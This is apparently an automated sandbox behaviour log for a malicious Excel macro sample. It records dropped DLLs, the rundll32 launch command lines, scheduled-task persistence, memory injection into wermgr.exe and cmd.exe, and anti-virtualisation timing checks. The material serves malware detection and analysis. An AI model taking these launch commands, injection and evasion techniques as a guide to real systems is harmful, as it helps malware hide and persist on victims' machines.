Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800026C0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018003B6C4
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180023780
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180036828
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180019860
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180025868
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800188B0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800018CC
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000E8EC
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800158F8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018003396C
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180002A24
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018008FC84
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180014D24
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180002D88
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180007D89
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180083E30
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018008BE3C
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180024EC0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180003F38
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000BFE0

Source: SecuriteInfo.com.Heur.31681.xls

OLE indicator, VBA macros: true

Source: SecuriteInfo.com.Heur.31681.xls, type: SAMPLE

Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research

Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLS@14/16@5/5

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006E420 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000B848 LookupPrivilegeValueA,AdjustTokenPrivileges,

Source: C:\Windows\System32\cmd.exe

Code function: 9_2_000000018000BB84 CreateToolhelp32Snapshot,Process32First,Process32Next,StrStrIA,

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_0006BA20 CoCreateInstance,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Source: C:\Windows\System32\wermgr.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{79ED1AB7-4F83-DE32-0BD1-4533166B87A7}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD6CE.tmp

Source: SecuriteInfo.com.Heur.31681.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\System32\wermgr.exe

System information queried: HandleInformation

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW

Source: SecuriteInfo.com.Heur.31681.xls

ReversingLabs: Detection: 12%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {A9986821-F5E8-4178-8C7A-712EEA14850B} S-1-5-18:NT AUTHORITY\System:Service:
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E821032 StartW,VirtualAlloc,VirtualFree,LoadLibraryA,GetProcAddress,MessageBoxA,SendMessageA,SetTimer,KillTimer,

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290B40 push dword ptr [edx+14h]; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290205 push edx; iretd
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290AD8 push dword ptr [edx+14h]; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290B10 push dword ptr [edx+14h]; ret
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00086E83 push es; ret
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018004047A push ebp; ret
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018003259D push edi; ret

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\fndskfnds.dfm			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\fndskfnds.dfm

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\fndskfnds.dfm

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\fndskfnds.dfm

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Source: C:\Windows\System32\wermgr.exe

Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened,directoryQueried

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\System32\wermgr.exe

RDTSC instruction interceptor: First address: 0000000000067D50 second address: 0000000000067D50 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0002396Eh] 0x00000013 jmp 00007FE928B24D30h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov eax, edi 0x00000039 dec eax 0x0000003a not eax 0x0000003c dec eax 0x0000003d mov ebx, 6CEE0E00h 0x00000042 xor edx, edx 0x00000044 inc ecx 0x00000045 xchg byte ptr [eax+0Bh], cl 0x00000048 fmul dword ptr [ebx-17280808h] 0x0000004e aaa 0x0000004f arpl word ptr [eax], ax 0x00000051 add byte ptr [edi], cl

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_00067D50 rdtsc

Source: C:\Windows\System32\wermgr.exe

Code function: GetAdaptersInfo,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll

Source: C:\Windows\System32\taskeng.exe TID: 2948	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 2228	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 2960	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062E60 FindFirstFileW,FindNextFileW,
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063B00 FindFirstFileW,

Source: C:\Windows\System32\cmd.exe

Code function: 9_2_00000001800225AC GetSystemInfo,

Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 43489
Source: C:\Windows\System32\cmd.exe	Thread delayed: delay time: 30000

Source: C:\Windows\System32\cmd.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_00067D50 rdtsc

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_00072AD0 LdrLoadDll,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E821032 StartW,VirtualAlloc,VirtualFree,LoadLibraryA,GetProcAddress,MessageBoxA,SendMessageA,SetTimer,KillTimer,

Source: C:\Windows\System32\cmd.exe

Process token adjusted: Debug

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_0006F600 SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write

Hijacks the control flow in another process

Source: C:\Windows\System32\wermgr.exe	Memory written: PID: 3068 base: 1800B5000 value: FF
Source: C:\Windows\System32\wermgr.exe	Memory written: PID: 1688 base: 180079000 value: FF

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 60000
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: FFF593F8
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 60000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 49D790B4
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18009A000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18009A000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800B5000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800B5000
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800BA000
